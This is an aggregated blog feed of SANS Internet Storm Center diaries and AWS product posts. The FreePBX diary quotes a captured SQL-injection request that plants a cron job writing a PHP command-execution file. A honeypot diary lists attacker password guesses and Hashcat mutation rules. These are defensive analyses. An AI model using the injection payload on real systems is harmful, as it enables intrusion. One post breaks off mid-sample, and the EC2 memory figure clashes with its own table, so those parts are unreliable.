All posts by David

Polymorphic Python Malware, (Wed, Oct 8th)

This post was originally published on this site

Today, I spoted on VirusTotal an interesting Python RAT. They are tons of them but this one attracted my attention based on some function names present in the code: self_modifying_wrapper(), decrypt_and_execute() and polymorph_code(). A polymorphic malware is a type of malware that has been developed to repeatedly mutate its appearance or signature files at every execution time. The file got a very low score of 2/64 on VT! (SHA256:7173e20e7ec217f6a1591f1fc9be6d0a4496d78615cc5ccdf7b9a3a37e3ecc3c).

Exploit Against FreePBX (CVE-2025-57819) with code execution., (Tue, Oct 7th)

This post was originally published on this site

FreePBX is a popular PBX system built around the open source VoIP system Asterisk. To manage Asterisk more easily, it provides a capable web-based admin interface. Sadly, like so many web applications, it has had its share of vulnerabilities in the past. Most recently, a SQL injection vulnerability was found that allows attackers to modify the database.

For a PBX, there are a number of obvious attacks. For example, they are often abused for free phone calls, to impersonate the companies running the PBX, or to hide the true origin of phone calls. Manipulating the FreePBX database would certainly facilitate these types of attacks. However, I noticed some slightly more interesting attacks recently attempting to achieve complete code execution.

A typical request looks like:

GET /admin/ajax.php?module=FreePBXmodulesendpointajax&command=model&template=x&model=model&brand=x' ;INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES ('sysadmin','takdak','echo "PD9waHAgaGVhZGVyKCd4X3BvYzogQ1ZFLTIwMjUtNTc4MTknKTsgZWNobyBzaGVsbF9leGVjKCd1bmFtZSAtYScpOyB1bmxpbmsoX19GSUxFX18pOyA/Pgo="|base64 -d >/var/www/html/rspgf.php',NULL,'* * * * *',30,1,1) --

The "brand" parameter is used for the SQL injection, and the parameter decodes to:

 ;INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES ('sysadmin','takdak','echo "PD9waHAgaGVhZGVyKCd4X3BvYzogQ1ZFLTIwMjUtNTc4MTknKTsgZWNobyBzaGVsbF9leGVjKCd1bmFtZSAtYScpOyB1bmxpbmsoX19GSUxFX18pOyA/Pgo="|base64 -d >/var/www/html/rspgf.php',NULL,'* * * * *',30,1,1) --

FreePBX uses the "cron_jobs" database to assist in the management of cron jobs. Inserting a line into the table results in simple, arbitrary code execution. The command injected creates a file /var/www/html/rspgf.php, with the following content:

<?php header('x_poc: CVE-2025-57819'); echo shell_exec('uname -a'); unlink(__FILE__); ?>

So, a simple test to see if the system is vulnerable. Interestingly, the file deletes itself after being accessed by the attacker. The cron job should persist and re-create the file every minute, which makes the "unlink" kind of pointless. I do not see any hits in our honeypot for this file. Reviewing the cron_jobs table should be another good way to find similar exploits.

Please make sure your FreePBX instance is up to date. The vulnerability was initially made public on August 28th [1], and was already exploited at the time.

[1] https://community.freepbx.org/t/security-advisory-please-lock-down-your-administrator-access/107203

 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introducing new compute-optimized Amazon EC2 C8i and C8i-flex instances

This post was originally published on this site

After launching Amazon Elastic Compute Cloud (Amazon EC2) memory-optimized R8i and R8i-flex instances and general-purpose M8i and M8i-flex instances, I am happy to announce the general availability of compute-optimized C8i and C8i-flex instances powered by custom Intel Xeon 6 processors available only on AWS with sustained all-core 3.9 GHz turbo frequency and feature a 2:1 ratio of memory to vCPU. These instances deliver the highest performance and fastest memory bandwidth among comparable Intel processors in the cloud.

The C8i and C8i-flex instances offer up to 15 percent better price-performance, and 2.5 times more memory bandwidth compared to C7i and C7i-flex instances. The C8i and C8i-flex instances are up to 60 percent faster for NGINX web applications, up to 40 percent faster for AI deep learning recommendation models, and 35 percent faster for Memcached stores compared to C7i and C7i-flex instances.

C8i and C8i-flex instances are ideal for running compute-intensive workloads, such as web servers, caching, Apache.Kafka, ElasticSearch, batch processing, distributed analytics, high performance computing (HPC), ad serving, highly scalable multiplayer gaming, and video encoding.

As like other 8th generation instances, these instances use the new sixth generation AWS Nitro Cards, delivering up to two times more network and Amazon Elastic Block Storage (Amazon EBS) bandwidth compared to the previous generation instances. They also support bandwidth configuration with 25 percent allocation adjustments between network and Amazon EBS bandwidth, enabling better database performance, query processing, and logging speeds.

C8i instances
C8i instances provide up to 384 vCPUs and 768 TB memory including bare metal instances that provide dedicated access to the underlying physical hardware. These instances help you to run compute-intensive workloads, such as CPU-based inference, and video streaming that need the largest instance sizes or high CPU continuously.

Here are the specs for C8i instances:

Instance size vCPUs Memory (GiB) Network bandwidth (Gbps) EBS bandwidth (Gbps)
c8i.large 2 4 Up to 12.5 Up to 10
c8i.xlarge 4 8 Up to 12.5 Up to 10
c8i.2xlarge 8 16 Up to 15 Up to 10
c8i.4xlarge 16 32 Up to 15 Up to 10
c8i.8xlarge 32 64 15 10
c8i.12xlarge 48 96 22.5 15
c8i.16xlarge 64 128 30 20
c8i.24xlarge 96 192 40 30
c8i.32xlarge 128 256 50 40
c8i.48xlarge 192 384 75 60
c8i.96xlarge 384 768 100 80
c8i.metal-48xl 192 384 75 60
c8i.metal-96xl 384 768 100 80

C8i-flex instances
C8i-flex instances are a lower-cost variant of the C8i instances, with 5 percent better price performance at 5 percent lower prices. These instances are designed for workloads that benefit from the latest generation performance but don’t fully utilize all compute resources. These instances can reach up to the full CPU performance 95 percent of the time.

Here are the specs for the C8i-flex instances:

Instance size vCPUs Memory (GiB) Network bandwidth (Gbps) EBS bandwidth (Gbps)
c8i-flex.large 2 4 Up to 12.5 Up to 10
c8i-flex.xlarge 4 8 Up to 12.5 Up to 10
c8i-flex.2xlarge 8 16 Up to 15 Up to 10
c8i-flex.4xlarge 16 32 Up to 15 Up to 10
c8i-flex.8xlarge 32 64 Up to 15 Up to 10
c8i-flex.12xlarge 48 96 Up to 22.5 Up to 15
c8i-flex.16xlarge 64 128 Up to 30 Up to 20

If you’re currently using earlier generations of compute-optimized instances, you can adopt C8i-flex instances without having to make changes to your application or your workload.

Now available
Amazon EC2 C8i and C8i-flex instances are available today in the US East (N. Virginia), US East (Ohio), US West (Oregon), and Europe (Spain) AWS Regions. C8i and C8i-flex instances can be purchased as On-Demand, Savings Plan, and Spot instances. C8i instances are also available in Dedicated Instances and Dedicated Hosts. To learn more, visit the Amazon EC2 Pricing page.

Give C8i and C8i-flex instances a try in the Amazon EC2 console. To learn more, visit the Amazon EC2 C8i instances page and send feedback to AWS re:Post for EC2 or through your usual AWS Support contacts.

Channy

AWS IAM Identity Center now supports customer-managed KMS keys for encryption at rest

This post was originally published on this site

Starting today, you can use your own AWS Key Management Service (AWS KMS) keys to encrypt identity data, such as user and group attributes, stored in AWS IAM Identity Center organization instances.

Many organizations operating in regulated industries need complete control over encryption key management. While Identity Center already encrypts data at rest using AWS-owned keys, some customers require the ability to manage their own encryption keys for audit and compliance purposes.

With this launch, you can now use customer-managed KMS keys (CMKs) to encrypt Identity Center identity data at rest. CMKs provide you with full control over the key lifecycle, including creation, rotation, and deletion. You can configure granular access controls to keys with AWS Key Management Service (AWS KMS) key policies and IAM policies, helping to ensure that only authorized principals can access your encrypted data. At launch time, the CMK must reside in the same AWS account and Region as your IAM Identity Center instance. The integration between Identity Center and KMS provides detailed AWS CloudTrail logs for auditing key usage and helps meet regulatory compliance requirements.

Identity Center supports both single-Region and multi-Region keys to match your deployment needs. While Identity Center instances can currently only be deployed in a single Region, we recommend using multi-Region AWS KMS keys unless your company policies restrict you to single-Region keys. Multi-Region keys provide consistent key material across Regions while maintaining independent key infrastructure in each Region. This gives you more flexibility in your encryption strategy and helps future-proof your deployment.

Let’s get started
Let’s imagine I want to use a CMK to encrypt the identity data of my Identity Center organization instance. My organization uses Identity Center to give employees access to AWS managed applications, such as Amazon Q Business or Amazon Athena.

As of today, some AWS managed applications cannot be used with Identity Center configured with a customer managed KMS key. See AWS managed applications that you can use with Identity Center to keep you updated with the ever evolving list of compatible applications.

The high-level process requires first to create a symmetric customer managed key (CMK) in AWS KMS. The key must be configured for encrypt and decrypt operations. Next, I configure the key policies to grant access to Identity Center, AWS managed applications, administrators, and other principals who need access the Identity Center and IAM Identity Center service APIs. Depending on your usage of Identity Center, you’ll have to define different policies for the key and IAM policies for IAM principals. The service documentation has more details to help you cover the most common use cases.

This demo is in three parts. I first create a customer managed key in AWS KMS and configure it with permissions that will authorize Identity Center and AWS managed applications to use it. Second, I update the IAM policies for the principals that will use the key from another AWS account, such as AWS applications administrators. Finally, I configure Identity Center to use the key.

Part 1: Create the key and define permissions

First, let’s create a new CMK in AWS KMS.

AWS KMW, screate key, part 1

The key must be in the same AWS Region and AWS account as the Identity Center instance. You must create the Identity Center instance and the key in the management account of your organization within AWS Organization.

I navigate to the AWS Key Management Service (AWS KMS) console in the same Region as my Identity Center instance, then I choose Create a key. This launches me into the key creation wizard.

AWS KMW, screate key, part 2

Under Step 1–Configure key, I select the key type–either Symmetric (a single key used for both encryption and decryption) or Asymmetric (a public-private key pair for encryption/decryption and signing/verification). Identity Center requires symmetric keys for encryption at rest. I select Symmetric.

For key usage, I select Encrypt and decrypt which allows the key to be used only for encrypting and decrypting data.

Under Advanced options, I select KMS – recommended for Key material origin, so AWS KMS creates and manages the key material.

For Regionality, I choose between Single-Region or Multi-Region key. I select Multi-Region key to allow key administrators to replicate the key to other Regions. As explained already, Identity Center doesn’t require this today but it helps to future-proof your configuration. Remember that you can not transform a single-Region key to a multi-Region one after its creation (but you can change the key used by Identity Center).

Then, I choose Next to proceed with additional configuration steps, such as adding labels, defining administrative permissions, setting usage permissions, and reviewing the final configuration before creating the key.

AWS KMS, screate key, part 3

Under Step 2–Add Labels, I enter an Alias name for my key and select Next.

In this demo, I am editing the key policy by adding policy statements using templates provided in the documentation. I skip Step 3 and Step 4 and navigate to Step 5–Edit key policy.

AWS KMS, screate key, part 5

Identity Center requires, at the minimum, permissions allowing Identity Center and its administrators to use the key. Therefore, I add three policy statements, the first and second authorize the administrators of the service, the third one to authorize the Identity Center service itself.

{
	"Version": "2012-10-17",
	"Id": "key-consolepolicy-3",
	"Statement": [
		{
			"Sid": "Allow_IAMIdentityCenter_Admin_to_use_the_KMS_key_via_IdentityCenter_and_IdentityStore",
			"Effect": "Allow",
			"Principal": {
				"AWS": "ARN_OF_YOUR_IDENTITY_CENTER_ADMIN_IAM_ROLE"
			},
			"Action": [
				"kms:Decrypt",
				"kms:Encrypt",
				"kms:GenerateDataKeyWithoutPlaintext"
			],
			"Resource": "*",
			"Condition": {
				"StringLike": {
					"kms:ViaService": [
						"sso.*.amazonaws.com",
						"identitystore.*.amazonaws.com"
					]
				}
			}
		},
		{
			"Sid": "Allow_IdentityCenter_admin_to_describe_the_KMS_key",
			"Effect": "Allow",
			"Principal": {
				"AWS": "ARN_OF_YOUR_IDENTITY_CENTER_ADMIN_IAM_ROLE"
			},
			"Action": "kms:DescribeKey",
			"Resource": "*"
		},
		{
			"Sid": "Allow_IdentityCenter_and_IdentityStore_to_use_the_KMS_key",
			"Effect": "Allow",
			"Principal": {
				"Service": [
					"sso.amazonaws.com",
					"identitystore.amazonaws.com"
				]
			},
			"Action": [
				"kms:Decrypt",
				"kms:ReEncryptTo",
				"kms:ReEncryptFrom",
				"kms:GenerateDataKeyWithoutPlaintext"
			],
			"Resource": "*",
            "Condition": {
    	       "StringEquals": { 
                      "aws:SourceAccount": "<Identity Center Account ID>" 
	           }
            }		
		},
		{
			"Sid": "Allow_IdentityCenter_and_IdentityStore_to_describe_the_KMS_key",
			"Effect": "Allow",
			"Principal": {
				"Service": [
					"sso.amazonaws.com",
					"identitystore.amazonaws.com"
				]
			},
			"Action": [
				"kms:DescribeKey"
			],
			"Resource": "*"
		}		
	]
}

I also have to add additional policy statements to allow my use case: the use of AWS managed applications. I add these two policy statements to authorize AWS managed applications and their administrators to use the KMS key. The document lists additional use cases and their respective policies.

{
    "Sid": "Allow_AWS_app_admins_in_the_same_AWS_organization_to_use_the_KMS_key",
    "Effect": "Allow",
    "Principal": "*",
    "Action": [
        "kms:Decrypt"
    ],
    "Resource": "*",
    "Condition": {
        "StringEquals" : {
           "aws:PrincipalOrgID": "MY_ORG_ID (format: o-xxxxxxxx)"
        },
        "StringLike": {
            "kms:ViaService": [
                "sso.*.amazonaws.com", "identitystore.*.amazonaws.com"
            ]
        }
    }
},
{
   "Sid": "Allow_managed_apps_to_use_the_KMS_Key",
   "Effect": "Allow",
   "Principal": "*",
   "Action": [
      "kms:Decrypt"
    ],
   "Resource": "*",
   "Condition": {
      "Bool": { "aws:PrincipalIsAWSService": "true" },
      "StringLike": {
         "kms:ViaService": [
             "sso.*.amazonaws.com", "identitystore.*.amazonaws.com"
         ]
      },
      "StringEquals": { "aws:SourceOrgID": "MY_ORG_ID (format: o-xxxxxxxx)" }
   }
}

You can further restrict the key usage to a specific Identity Center instance, specific application instances, or specific application administrators. The documentation contains examples of advanced key policies for your use cases.

To help protect against IAM role name changes when permission sets are recreated, use the approach described in the Custom trust policy example.

Part 2: Update IAM policies to allow use of the KMS key from another AWS account

Any IAM principal that uses the Identity Center service APIs from another AWS account, such as Identity Center delegated administrators and AWS application administrators, need an IAM policy statement that allows use of the KMS key via these APIs.

I grant permissions to access the key by creating a new policy and attaching the policy to the IAM role relevant for my use case. You can also add these statements to the existing identity-based policies of the IAM role.

To do so, after the key is created, I locate its ARN and replace the key_ARNin the template below. Then, I attach the policy to the managed application administrator IAM principal. The documentation also covers IAM policies that grants Identity Center delegated administrators permissions to access the key.

Here is an example for managed application administrators:

{
      "Sid": "Allow_app_admins_to_use_the_KMS_key_via_IdentityCenter_and_IdentityStore",
      "Effect": "Allow",
      "Action": 
        "kms:Decrypt",
      "Resource": "<key_ARN>",
      "Condition": {
        "StringLike": {
          "kms:ViaService": [
            "sso.*.amazonaws.com",
            "identitystore.*.amazonaws.com"
          ]
        }
      }
    }

The documentation shares IAM policies template for the most common use cases.

Part 3: Configure IAM Identity Center to use the key

I can configure a CMK either during the enablement of an Identity Center organization instance or on an existing instance, and I can change the encryption configuration at any time by switching between CMKs or reverting to AWS-owned keys.

Please note that an incorrect configuration of KMS key permissions can disrupt Identity Center operations and access to AWS managed applications and accounts through Identity Center. Proceed carefully to this final step and ensure you have read and understood the documentation.

After I have created and configured my CMK, I can select it under Advanced configuration when enabling Identity Center.

IDC with CMK configuration

To configure a CMK on an existing Identity Center instance using the AWS Management Console, I start by navigating to the Identity Center section of the AWS Management Console. From there, I select Settings from the navigation pane, then I select the Management tab, and select Manage encryption in the Key for encrypting IAM Identity Center data at rest section.

Change key on existing IDC

At any time, I can select another CMK from the same AWS Account, or switch back to an AWS-managed key.

After choosing Save, the key change process takes a few seconds to complete. All service functionalities continue uninterrupted during the transition. If, for whatever reasons, Identity Center can not access the new key, an error message will be returned and Identity Center will continue to use the current key, keeping your identity data encrypted with the mechanism it is already encrypted with.

CMK on IDC, select a new key

Things to keep in mind
The encryption key you create becomes a crucial component of your Identity Center. When you choose to use your own managed key to encrypt identity attributes at rest, you have to verify the following points.

  • Have you configured the necessary permissions to use the KMS key? Without proper permissions, enabling the CMK may fail or disrupt IAM Identity Center administration and AWS managed applications.
  • Have you verified that your AWS managed applications are compatible with CMK keys? For a list of compatible applications, see AWS managed applications that you can use with IAM Identity Center. Enabling CMK for Identity Center that is used by AWS managed applications incompatible with CMK will result in operational disruption for those applications. If you have incompatible applications, do not proceed.
  • Is your organization using AWS managed applications that require additional IAM role configuration to use the Identity Center and Identity Store APIs? For each such AWS managed application that’s already deployed, check the managed application’s User Guide for updated KMS key permissions for IAM Identity Centre usage and update them as instructed to prevent application disruption.
  • For brevity, the KMS key policy statements in this post omit the encryption context, which allows you to restrict the use of the KMS key to Identity Center including a specific instance. For your production scenarios, you can add a condition like this for Identity Center:
    "Condition": {
       "StringLike": {
          "kms:EncryptionContext:aws:sso:instance-arn": "${identity_center_arn}",
          "kms:ViaService": "sso.*.amazonaws.com"
        }
    }

    or this for Identity Store:

    "Condition": {
       "StringLike": {
          "kms:EncryptionContext:aws:identitystore:identitystore-arn": "${identity_store_arn}",
          "kms:ViaService": "identitystore.*.amazonaws.com"
        }
    }

Pricing and availability
Standard AWS KMS charges apply for key storage and API usage. Identity Center remains available at no additional cost.

This capability is now available in all AWS commercial Regions, AWS GovCloud (US), and AWS China Regions. To learn more, visit the IAM Identity Center User Guide.

We look forward to learning how you use this new capability to meet your security and compliance requirements.

— seb

AWS Weekly Roundup: Amazon Bedrock, AWS Outposts, Amazon ECS Managed Instances, AWS Builder ID, and more (October 6, 2025)

This post was originally published on this site

Last week, Anthropic’s Claude Sonnet 4.5—the world’s best coding model according to SWE-Bench – became available in Amazon Q command line interface (CLI) and Kiro. I’m excited about this for two reasons:

First, a few weeks ago I spent 4 intensive days with a global customer delivering an AI-assisted development workshop, where I experienced firsthand how Amazon Q CLI boosts developer productivity. During the workshop, the customer was able to add a new feature in their application within a day using Amazon Q CLI, which would have traditionally taken them at least a couple of weeks. With Anthropic’s Claude Sonnet 4.5 in Amazon Q CLI, I know developer productivity will be enhanced further.

Second, I’ve started preparing for my code talk at AWS re:Invent 2025, where my co-speaker and I will show live coding to modernize a legacy codebase using Kiro. I can’t wait to use Anthropic’s Claude Sonnet 4.5 in Kiro to create a live demo. If you want to see this demo and over a thousand other sessions on cloud and AI, join us at AWS re:Invent 2025 in Las Vegas from December 1–5.

Last week’s launches
Here are some launches that got my attention:

  • Availability of Claude Sonnet 4.5 in Amazon Bedrock – Anthropic’s most intelligent model, best for coding and complex agents, is now available in Amazon Bedrock. By using Claude Sonnet 4.5 in Amazon Bedrock, developers gain access to a fully managed service that not only provides a unified API for foundation models (FMs) but keeps their data under complete control with enterprise-grade tools for security, and optimization.
  • AWS Outposts supports third-party storage integration with Dell and HPE – AWS Outposts third-party storage integration now includes Dell PowerStore and HPE Alletra Storage MP B10000 systems, joining the list of existing integrations with NetApp on-premises enterprise storage arrays and Pure Storage FlashArray. This integration serves three key purposes. First, it helps you maintain your existing storage infrastructure while migrating VMware workloads to AWS. Second, it helps you meet strict data residency requirements by keeping your data on premises while using AWS services. Third, it means you can use AWS Outposts with third-party storage arrays through AWS tooling.
  • Amazon ECS Managed Instances now available – Amazon ECS Managed Instances for containerized applications is a new fully managed compute option for Amazon ECS designed to eliminate infrastructure management overhead while giving you access to the full capabilities of Amazon EC2. ECS Managed Instances helps you quickly launch and scale your workloads while enhancing performance and reducing your total cost of ownership.
  • Application map is now generally available for Amazon CloudWatch – Amazon CloudWatch now helps you monitor large-scale distributed applications by automatically discovering and organizing services into groups based on configurations and their relationships. With this new application performance monitoring (APM) capability, you can quickly visualize which applications and dependencies to focus on while troubleshooting your distributed applications.
  • Amazon Bedrock AgentCore Model Context Protocol (MCP) server now available – With built-in support for runtime, gateway integration, identity management, and agent memory, the AgentCore MCP server is purpose-built to speed up creation of components compatible with Bedrock AgentCore. You can use the AgentCore MCP server for rapid prototyping, production AI solutions, or to scale your agent infrastructure.

Additional Updates
Here are some additional news items and blog posts that I found interesting:

  • AWS Builder ID now supports Sign in with Google – You can now create an AWS Builder ID using sign in with Google. AWS Builder ID is a personal profile that provides access to AWS applications including Kiro, AWS Builder Center, AWS Training and Certification, AWS re:Post and AWS Startups.
  • AWS API MCP Server v1.0.0 release – AWS API MCP server acts as a bridge between AI assistants and AWS services enabling foundation models to interact with any AWS API through natural language by creating and executing syntactically correct CLI commands. The AWS API MCP Server is open-source and available now on AWS Labs GitHub repository.
  • AWS Knowledge MCP Server now generally available – The AWS Knowledge server gives AI agents and MCP clients access to authoritative knowledge, including documentation, blog posts, What’s New announcements, and Well-Architected best practices, in an LLM-compatible format. With this release, the server also includes knowledge about the regional availability of AWS APIs and CloudFormation resources.
  • AWS Transform now enables Terraform for VMware network automation – AWS Transform now offers Terraform as an additional option to generate network infrastructure code automatically from VMware environments. The service converts your source network definitions into reusable Terraform modules, complementing current AWS CloudFormation and AWS Cloud Development Kit (CDK) support.

Upcoming AWS events
Check your calendar and sign up for upcoming AWS events:

  • AWS AI Agent Global Hackathon – This is your chance to dive deep into our powerful generative AI stack and create something truly awesome. From September 8th to October 20th, you have the opportunity to create AI agents using AWS suite of AI services, competing for over $45,000 in prizes and exclusive go-to-market opportunities.
  • AWS Gen AI Lofts – You can learn AWS AI products and services with exclusive sessions, meet industry-leading experts, and have valuable networking opportunities with investors and peers. Register in your nearest city: Paris (October 7–21), London (Oct 13–21), and Tel Aviv (November 11–19).
  • AWS Community Days – Join community-led conferences that feature technical discussions, workshops, and hands-on labs led by expert AWS users and industry leaders from around the world: Munich (October 7), Budapest (October 16).

You can browse all upcoming AWS events and AWS startup events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

Prasad

More .well-known Scans, (Thu, Oct 2nd)

This post was originally published on this site

I have been writing about the ".well-known" directory a few times before. Recently, about attackers hiding webshells [1], and before that, about the purpose of the directory and why you should set up a "/.well-known/security.txt" file. But I noticed something else when I looked at today's logs on this web server. Sometimes you do not need a honeypot. Some attackers are noisy enough to be easily visible on a busy web server. This time, the attacker hit various URLs inside the ".well-known" directory. Here is a sample from the > 100 URLs hit:

[Guest Diary] Comparing Honeypot Passwords with HIBP, (Wed, Oct 1st)

This post was originally published on this site

[This is a Guest Diary by Draden Barwick, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

DShield Honeypots are constantly exposed to the internet and inundated with exploit traffic, login attempts, and other malicious activity. Analyzing the logged password attempts can help identify what attackers are targeting. To go through these passwords, I have created a tool that leverages HaveIBeenPwned’s (HIBP’s) API to flag passwords that haven’t appeared in any breaches.

Purpose

Identifying passwords that haven’t been seen in known breaches is useful because it can indicate additional planning and help identify patterns in these less common passwords. Anyone that operates a honeypot (and receives a lot of data on attempted use of passwords in plaintext) could benefit from this project as an additional starting point for investigations.

Development

HaveIBeenPwned maintains a large database of breached passwords and offers an API to tell if a given password has been compromised. This is done by making a request to “https://api.pwnedpasswords.com/range/#####”. Where the “#####” part in a request is the first 5 characters (prefix) of the SHA1 hash of the tested password. The site will return a list of the last 35 characters (suffix) for any password hash in the database that starts with the provided prefix. Each entry includes a count of how many times the corresponding password has been seen in breaches. This prevents anyone from knowing the full hash of the password we are looking for based on the request alone. While this consideration is not important for our use with the DShield honeypots (as all passwords seen are publicly uploaded), it is important to understand because HIBP does not allow for searching with the full hash directly [2].

To gather a list of all passwords my honeypot has gathered, I used JQ to parse the cowrie.json files located in the /srv/cowrie/var/log/cowrie directory. This command matches on any login failures or successes, and returns the password field from matching entries:

jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* 

To extend this, we can remove duplicates using sort and uniq and save the unique passwords to a file:

jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* | sort | uniq > ~/uniquepass.txt

As of writing, this took the number of passwords from 51,601 to 16,210 unique passwords.

Now that we have a list of unique passwords, the next steps are to: read the created password file, take the SHA1 hash of each line, query the API for the hash prefix, and check for the hash suffix in the results.

To accomplish this, I created a Python script that utilizes one input file and two output files. The input file has a list of passwords to check with one entry per line. One output file stores all passwords that have been checked, the SHA1 hash, and how many times HIBP has seen the password (this file is a CSV used to avoid checking a password in the input file if it has been checked before). The other output file stores the plaintext of any password never seen by HIBP. The command line usage looks like this:

python3 queryHIBP.py uniquepass.txt passwordResults.csv unseenPasswords.txt

This resulted in the identification of 1,196 passwords that HIBP has not seen.

Code Breakdown

The code, available on GitHub [3], has thorough commenting but we will examine some parts here to gain a deeper understanding of how it functions.

In Figure 1, we can see the section of code that handles reading the results file that includes all passwords we have searched for. This is expected to be formatted as a CSV file with a header of “password,sha1,count”. As explained above, this helps avoid checking passwords unnecessarily.

The code opens the file with csv.DictReader, checks for “password” in the header, then uses a for loop to go through all of the rows to pull non-empty passwords and add them to a set. The set is returned at the end of the function.

 
Figure 1: Code used to read all previously checked passwords.

 

In Figure 2, we can see the code used to make API requests and handle a common error. First, a loop is established and the API request is made. Second, we check for a 429 response code which means there were too many requests. If there was a 429 error, HIBP will add a “Retry-After” header which lets us know how long to wait before trying again. The user agent is specified elsewhere as “PasswordCheckingProject” because HIBP states that “A missing user agent will result in an HTTP 403 response” [4].


Figure 2: Code used to make API requests and handle expected 429 errors.

 

Figure 3 shows the behavior for handling additional errors and normal function. Firstly, “resp.raise_for_status” is called which would raise an exception if there were an error with the HTTP request. If there’s no error, we simply iterate through all lines of the response to save the hash suffix and count in a dictionary, then return it. If an exception is raised, we increment an “attempt” variable which lets us cap the number of retries which is set to three by default. If the max is hit here, the code will print an error message indicating what prefix was being checked and exit. If there are more retries remaining, the script will wait 5 seconds before continuing. Figure 2 has a similar check for max retries to avoid a potential infinite loop of 429 errors.


Figure 3: Code used to store & return request results or deal with continued/unexpected errors.

 

Implementation

To download the project and try it out with some test data, one can run the following:

git clone https://github.com/MeepStryker/queryHIBP.git
cd queryHIBP
python3 queryHIBP.py ./sampleInput.txt ./passwordResults.csv ./unseenPasswords.txt

As the script runs, it will print out each unseen password identified and a short summary at the end as seen in Figure 4.


Figure 4: Script output using real data.

 

Automation

To automate the use of this tool, I created a cron job to run the JQ command & output results to a file and made another job to run the script with the needed arguments. These are set to run daily with the script running 5 minutes after the JQ command. This uses the following crontab entries:

0 17 * * * jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* | sort | uniq > ~/uniquepass.txt

5 17 * * * python3 ~/queryHIBP.py ~/uniquepass.txt ~/passwordResults.csv ~/unseenPasswords.txt

The script runs 5 minutes after the JQ command to ensure there is more than enough time to create the input file. Since there is a limit on how long logs are retained, there are no concerns about this ever starting to take longer.

I chose this method over adding parsing functionality into the script out of convenience. Using the script would require additional logic and either hardcoding locations to check for logs or dealing with more arguments. As it is designed, anyone can easily plugin a list of passwords without having to worry about many command line options or editing the script.

Results

The script accurately provides information on passwords that HaveIBeenPwned has not seen in prior breaches. While there were more unseen passwords than one may expect (1,196 or ~7.4% of all unique passwords as of writing), it provides interesting insight into what some actors may be targeting. The results also reveal patterns for password mutations that are being leveraged for access attempts:

deploy12345
deploy123456
deploy1234567
deploy12345678
deploy@2022
deploy@2023
deploy@2025
deploy2025
deploy@321
deploypass
P@$$vords123
P@$sw0rd#
P4$$word!@#
P455wORd
P@55W0RD2004
Pa$$word2016!
pa33w0rd!@
Pa55w0rd@2021
passw0rd!@#$
pass@w0rd.12345
passwd@123!
PaSswORD@123
password@2!@
PaSswORd2021
password!2024
password!2025
Password43213
password!@#456

Password Patterns & Analysis

Analyzing the passwords seen in the above Results section can provide some insight into what techniques are being used to generate passwords.

Consider the above sample of results. Broadly speaking, this ‘deploy family’ of passwords was likely generated by starting with a base password of “deploy” and adding common modifiers to increase complexity. Seen here are good examples of the most simple ones: adding the year (with an @ sign in this case) and adding sequential numbers.

The rest of the entries above are all based on the word ‘password’. These are more complex than what we saw with ‘deploy’. Below are three entries, a plain explanation of a Hashcat rule that could be used to come up with it, and a sample implementation of the rule:

  • P4$$word!@#
    • Capitalize the first letter, replace a’s with 4’s, replace s’s with $’s, add !@# to end – c sa4 ss$ $! $@ $#
  • P@55W0RD2004
    • Capitalize all letters, replace a’s with @’s, replace s’s with 5’s, replace o’s with 0’s, and add a year to the end – u sa@ ss5 so0 $2 $0 $0 $4
  • Password!2024
    • Capitalize the first letter, add ! and a year to the end – t0 $! $2 $0 $2 $4

Both Hashcat and John the Ripper can make these modifications by using rules to augment password lists. The rules allow various changes to input such as replacing or swapping certain characters with others. Note that while much of the rules syntax between these tools is similar, there are some differences [5].

Looking through the unseen passwords, we can also see more specific targets such as Elasticsearch, Oracle, PostgresSQL, and Ubuntu. Figure 5 shows some of these passwords, which use the same kind of modifications mentioned earlier, and illustrate the relative difference in frequency.


Figure 5: Passwords related to specific services/platforms.

Overall Takeaway

While a good amount of manual analysis will still be required, these results can provide a lot of value and the script helps cut down on time. We can learn more about common password modifications to avoid and even get an idea of the relative interest of different targets. In Figure 5 alone, we can see that PostgresSQL may be roughly two times more likely to be targeted than Elasticsearch with newer installations being targeted in particular.

For future work, I would add a feature to recheck the known unseen passwords to identify if they happen to be newly breached.

Additionally, I may consider adding two features for convenience. The first would be re-sorting the unseen file since it is append only. The second would be parsing features to simplify automation and allow the script to provide more functionality for end users.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://haveibeenpwned.com/API/v3#PwnedPasswords
[3] https://github.com/MeepStryker/queryHIBP
[4] https://haveibeenpwned.com/API/v3#UserAgent
[5] https://hashcat.net/wiki/doku.php?id=rule_based_attack#compatibility_with_other_rule_engines

 


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Announcing Amazon ECS Managed Instances for containerized applications

This post was originally published on this site

Today, we’re announcing Amazon ECS Managed Instances, a new compute option for Amazon Elastic Container Service (Amazon ECS) that enables developers to use the full range of Amazon Elastic Compute Cloud (Amazon EC2) capabilities while offloading infrastructure management responsibilities to Amazon Web Service (AWS). This new offering combines the operational simplicity of offloading infrastructure with the flexibility and control of Amazon EC2, which means customers can focus on building applications that drive innovation, while reducing total cost of ownership (TCO) and maintaining AWS best practices.

Customers running containerized workloads told us they want to combine the simplicity of serverless with the flexibility of self-managed EC2 instances. Although serverless options provide an excellent general-purpose solution, some applications require specific compute capabilities, such as GPU acceleration, particular CPU architectures, or enhanced networking performance. Additionally, customers with existing Amazon EC2 capacity investments through EC2 pricing options couldn’t fully use these commitments with serverless offerings.

